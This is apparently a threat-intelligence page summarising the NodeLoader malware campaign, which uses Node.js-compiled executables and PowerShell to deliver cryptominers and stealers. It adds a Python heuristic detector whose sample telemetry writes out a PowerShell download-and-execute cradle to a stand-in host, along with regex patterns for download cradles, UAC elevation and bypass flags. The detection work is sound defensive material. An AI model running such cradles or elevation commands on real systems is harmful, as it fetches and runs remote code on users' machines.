NodeLoader Exposed: The Node.js Malware Evading Detection

Dec. 16, 2024, 12:03 p.m.

Description

Zscaler ThreatLabz discovered a malware campaign that uses Node.js applications compiled into Windows executables to distribute cryptocurrency miners and information stealers. Named NodeLoader, this malware family relies on those Node.js-compiled executables to deliver second-stage payloads such as XMRig, Lumma, and Phemedrone Stealer. The attackers use social engineering, targeting gamers through YouTube and Discord and leading them to malicious websites that resemble legitimate gaming platforms. NodeLoader uses the sudo-prompt module to obtain elevated privileges (the module prompts the user through UAC) and employs various evasion techniques. The malware downloads and executes PowerShell scripts, which in turn download and run the additional payloads. The Node.js runtime bundled into each executable produces very large files, which complicates detection for some security products and results in low antivirus detection rates.
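The process chain described above (a large Node.js-compiled executable spawning PowerShell to fetch further payloads, with an elevation request made through sudo-prompt) is something a detection engineer can hunt for in process-creation telemetry. The detector below is an added example written for this page; it is not code from Zscaler ThreatLabz or from the NodeLoader samples. The events, file names, paths, the 30 MB size threshold, the use of node.exe's version-resource description to recognise pkg/nexe-style bundles, and the assumption that sudo-prompt elevates on Windows via Start-Process -Verb runAs are all constructed or assumed for illustration.

```python
"""Heuristic detector for a NodeLoader-style process chain.

Flags powershell.exe launched by a large Node.js-bundled executable
(pkg/nexe-style builds embed the Node runtime, so they are tens of MB
and usually keep node.exe's version-resource description), especially
when the command line carries a download cradle or a UAC elevation
request of the kind the sudo-prompt module issues on Windows
(Start-Process -Verb runAs; an assumption, not taken from the report).
All events, paths and thresholds below are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

LARGE_EXE_BYTES = 30 * 1024 * 1024     # assumed threshold for "large" binaries
NODE_DESCRIPTION = "node.js"           # assumed marker: node.exe's FileDescription
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|start-bitstransfer", re.I)
UAC_PROMPT = re.compile(r"start-process.*-verb\s+runas", re.I)
STEALTH_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop(rofile)?\b", re.I)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style)."""
    image: str
    command_line: str
    parent_image: str
    parent_description: str   # FileDescription from the parent's version resource
    parent_size: int          # parent image size in bytes


@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)

    def hit(self, points, why):
        self.score += points
        self.reasons.append(why)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_node_bundle(ev):
    """Parent carries the Node runtime, is not node.exe itself, and is large."""
    return (NODE_DESCRIPTION in ev.parent_description.lower()
            and basename(ev.parent_image) != "node.exe"
            and ev.parent_size >= LARGE_EXE_BYTES)


def score_event(ev):
    f = Finding()
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return f
    if is_node_bundle(ev):
        f.hit(3, "PowerShell spawned by a large Node.js-bundled executable")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        f.hit(3, "download cradle in command line")
    if UAC_PROMPT.search(ev.command_line):
        f.hit(2, "UAC elevation via Start-Process -Verb runAs (sudo-prompt pattern)")
    if STEALTH_FLAGS.search(ev.command_line):
        f.hit(1, "hidden window / execution-policy bypass flags")
    return f


def detect(events, threshold=5):
    """Return (event, finding) pairs whose score reaches the threshold."""
    flagged = []
    for ev in events:
        f = score_event(ev)
        if f.score >= threshold:
            flagged.append((ev, f))
    return flagged


# Constructed sample telemetry; every name and path here is invented.
LOADER = r"C:\Users\player\Downloads\GameBooster.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(PS, "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://example.invalid/stage2.ps1')\"",
              LOADER, "Node.js: Server-side JavaScript", 45 * 1024 * 1024),
    ProcEvent(PS, "powershell.exe -Command \"Start-Process -FilePath cmd.exe "
                  "-ArgumentList '/c C:\\Users\\player\\AppData\\Local\\Temp\\run.bat' -Verb runAs\"",
              LOADER, "Node.js: Server-side JavaScript", 45 * 1024 * 1024),
    ProcEvent(PS, "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp",
              r"C:\Windows\explorer.exe", "Windows Explorer", 4 * 1024 * 1024),
    ProcEvent(PS, "powershell.exe -Command Get-Date",
              r"C:\Tools\internal-cli.exe", "Node.js: Server-side JavaScript", 50 * 1024 * 1024),
]

if __name__ == "__main__":
    for ev, f in detect(SAMPLE_EVENTS):
        print(f"[score {f.score}] {ev.parent_image} -> {ev.command_line}")
        for why in f.reasons:
            print("   -", why)
```

The scoring is deliberately additive so that a legitimate Node.js-bundled CLI running a harmless PowerShell command (the fourth event) stays below the threshold, while the elevation request alone, coming from the same kind of parent, is enough to surface the second event; tune the threshold and weights against your own baseline before deploying anything like this.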

Date

  • Created: Dec. 13, 2024, 10:59 p.m.
  • Published: Dec. 13, 2024, 10:59 p.m.
  • Modified: Dec. 16, 2024, 12:03 p.m.

Attack Patterns

  • Phemedrone Stealer
  • NodeLoader
  • Lumma Stealer
  • XMRig

Additional Information

  • Gaming